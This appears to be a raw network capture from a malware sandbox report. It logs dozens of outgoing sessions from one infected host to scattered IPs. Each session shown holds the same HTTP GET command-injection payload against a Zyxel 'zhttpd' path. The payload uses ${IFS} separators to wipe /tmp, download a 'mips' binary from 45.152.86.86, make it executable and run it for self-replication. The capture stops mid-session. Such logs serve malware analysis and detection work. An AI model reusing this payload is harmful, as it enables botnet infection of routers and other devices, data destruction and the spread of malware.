                              Mar 31, 2024 08:41:14.680372000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2630192.168.2.1334354223.178.102.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.680658102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2631192.168.2.1360286172.99.155.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.680730104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2632192.168.2.1346510182.97.41.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.680753946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2633192.168.2.1359308189.72.191.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.680809975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2634192.168.2.1335630139.236.185.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.680844069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2635192.168.2.135938241.12.43.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.680891991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2636192.168.2.1349474175.242.165.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.680941105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2637192.168.2.1353578122.63.90.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681003094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2638192.168.2.134913084.206.52.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681051970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2639192.168.2.1333248216.46.111.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681086063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2640192.168.2.13341289.18.131.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681148052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2641192.168.2.1358688128.241.12.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681204081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2642192.168.2.13500005.224.220.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681257963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2643192.168.2.13349489.124.91.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681310892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2644192.168.2.1350016159.192.11.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681355953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2645192.168.2.1345022157.89.111.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681399107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2646192.168.2.135535483.220.5.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681469917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2647192.168.2.1338890196.199.134.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681521893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2648192.168.2.1334118105.164.0.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681569099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2649192.168.2.134367499.156.224.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681610107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2650192.168.2.134569012.0.90.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681632042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2651192.168.2.133734684.81.171.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681689024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2652192.168.2.1354498201.229.181.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681750059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2653192.168.2.1345992208.34.133.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681790113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2654192.168.2.1359902133.220.135.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681852102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2655192.168.2.1341596102.207.191.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681880951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2656192.168.2.134619049.134.247.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681911945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2657192.168.2.134008496.152.207.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.681962013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2658192.168.2.1341158161.102.127.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.682002068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2659192.168.2.134903284.86.190.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.682063103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2660192.168.2.1344236203.27.176.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.682121038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2661192.168.2.135374252.126.137.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.682168961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2662192.168.2.1332928103.221.184.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.682219028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2663192.168.2.1333344123.84.196.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.682270050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2664192.168.2.1336702155.121.147.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.682323933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2665192.168.2.1338674172.107.201.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.682374954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2666192.168.2.13559868.197.3.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.682410002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2667192.168.2.1352324137.156.52.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.682462931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2668192.168.2.1335826139.140.90.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.682513952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2669192.168.2.1356316136.198.176.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.682540894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2670192.168.2.1335368123.120.38.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.682596922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2671192.168.2.1343380187.242.48.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.682657003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2672192.168.2.1344750164.152.242.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.682687044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2673192.168.2.13442242.165.220.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.682849884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2674192.168.2.133294865.99.36.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.682892084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2675192.168.2.135673486.185.55.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.682950020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2676192.168.2.134681670.187.40.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683000088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2677192.168.2.1352620145.70.67.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683049917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2678192.168.2.1357696121.212.46.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683092117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2679192.168.2.13354522.81.229.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683147907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2680192.168.2.1358228111.114.213.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683202982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2681192.168.2.133551231.216.51.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683254004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2682192.168.2.1349758155.6.51.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683274031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2683192.168.2.1352068212.7.68.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683351040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2684192.168.2.134065227.127.249.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683377981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2685192.168.2.1356458174.28.173.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683415890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2686192.168.2.133762024.123.173.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683480978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2687192.168.2.135146089.69.187.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683532000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2688192.168.2.1343288157.128.219.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683583975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2689192.168.2.1340630149.150.236.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683623075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2690192.168.2.1360446182.199.123.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683684111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2691192.168.2.134474495.43.234.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683737993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2692192.168.2.134980612.242.250.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683793068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2693192.168.2.1358278191.39.58.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683832884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2694192.168.2.135878293.200.243.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683877945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2695192.168.2.1359022202.18.62.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683939934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2696192.168.2.135424244.194.185.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.683990002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2697192.168.2.135765238.113.88.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684027910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2698192.168.2.1334522161.95.162.252443
                              TimestampBytes transferredDirectionData
